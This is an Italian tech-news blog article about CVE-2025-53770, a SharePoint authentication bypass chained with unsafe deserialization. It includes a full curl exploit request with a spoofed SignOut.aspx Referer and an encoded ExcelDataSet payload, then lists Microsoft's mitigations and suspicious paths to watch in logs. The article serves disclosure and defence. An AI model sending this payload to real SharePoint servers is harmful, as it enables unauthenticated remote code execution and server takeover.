Anche gli “altri” piangono: grave vulnerabilità in SharePoint consente attacchi RCE via curl

Patrick Di Fazio

È vero che ognuno dovrebbe guardare in casa propria, e nel contesto Linux di vulnerabilità ne emergono quotidianamente tantissime, ma la notizia che stiamo riportando è particolarmente importante e riguarda una componente con la quale, ahi noi, anche se non si usa un sistema operativo Microsoft, è necessario interfacciarsi. Parliamo di SharePoint, il software che consente di condividere contenuti e favorire la collaborazione sugli stessi.

Microsoft ha recentemente segnalato che alcuni attaccanti stanno sfruttando una vulnerabilità critica, identificata come CVE-2025-53770, per compromettere server SharePoint – chiaramente installati in modalità on-premise – attraverso un attacco concatenato.

L’exploit utilizza due vulnerabilità e non richiede alcuna interazione da parte dell’utente, consentendo di bypassare l’autenticazione e ottenere una Remote Code Execution (RCE). Le versioni di SharePoint interessate sono: Microsoft SharePoint Server 2016, Microsoft SharePoint Server 2019 e Microsoft SharePoint Server Subscription Edition. Con questo attacco un attaccante non autenticato può ottenere il pieno controllo del server SharePoint, con il rischio di compromettere l’intera infrastruttura aziendale.

L’origine dell’attacco è un bypass dell’autenticazione ad una pagina SharePoint unito ad una de-serializzazione non sicura di dati che permette il caricamento di codice arbitrario. E qui sta la parte rilevante di questa notizia, poiché il vettore di attacco prevede una richiesta HTTP POST realizzabile tramite una semplice curl che sfrutta la direttiva CompressedDataTable presente in applicazioni .NET.

Nella richiesta, il campo Referer viene popolato con /_layouts/SignOut.aspx, facendo credere che la richiesta provenga dalla pagina di logout e quindi non richieda autenticazione (CVE-2025-49706). Successivamente, il codice dannoso (codificato in base64) viene iniettato nel campo CompressedDataTable (CVE-2025-49704).

È già disponibile una PoC su GitHub che consente di colpire istanze vulnerabili di SharePoint e l’exploit è addirittura stato integrato anche in Metasploit come modulo esterno, rendendone l’uso estremamente semplice.

Di seguito presentiamo un esempio di richiesta curl in grado di compromettere un server SharePoint vulnerabile:

curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Dopo l’esecuzione di questa richiesta è possibile ottenere una shell sul server vittima che utilizza versioni di SharePoint vulnerabili.

Microsoft ha prontamente pubblicato le seguenti indicazioni per proteggere le istanze on-premises di SharePoint, sfruttando l’occasione per segnalare come necessario anche l’utilizzo di servizi a pagamento.

  • Utilizzare esclusivamente versioni supportate di Microsoft SharePoint Server.
  • Verificare che l’Antimalware Scan Interface (AMSI) sia attivata e configurata correttamente.
  • Installare Microsoft Defender for Endpoint o soluzioni equivalenti.
  • Eseguire la rotazione delle chiavi ASP.NET di SharePoint Server.

Per tutti gli amministratori di sistema che gestiscono server SharePoint, è fondamentale seguire queste indicazioni, monitorare i log, e in particolare prestare attenzione alle richieste sospette verso: /_layouts/SignOut.aspx e /_layouts/15/ToolPane.aspx?DisplayMode=Edit.

Insomma, pur non riguardando direttamente l’ambito Linux, questa vulnerabilità rappresenta una minaccia concreta che è già in fase di sfruttamento attivo, intervenire tempestivamente è essenziale.

Security Engineer
Appassionato di sicurezza informatica offensive, Linux e Open Source.

, , , ,

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

GitHub
KPA
Kubelab
Vai alla sezione Articoli
Vai ai Saturday’s Talks

Categories

Articoli (68) Il mmullato (12) Notizie (3218) Saturday's Talks (54)

Tag cloud

ai (76) AlmaLinux (34) Android (34) Bug (81) Canonical (86) CentOS (48) Cloud (63) container (52) Controversia (43) Debian (103) desktop (34) docker (65) Fedora (63) Firefox (37) GitHub (76) Gnome (35) Google (88) IBM (56) Intel (56) KDE (42) Kernel (262) Kubernetes (99) Linux (761) LTS (36) Malware (67) Microsoft (194) MicrosoftLovesLinux (37) Mozilla (37) open-source (416) Openstack (58) Oracle (35) Patch (36) Red Hat (176) Release (65) RHEL (44) Rust (39) SaturdaysTalks (52) Sicurezza (115) Software (41) SUSE (42) systemd (78) Torvalds (94) Ubuntu (180) Vulnerabilità (69) Windows (85)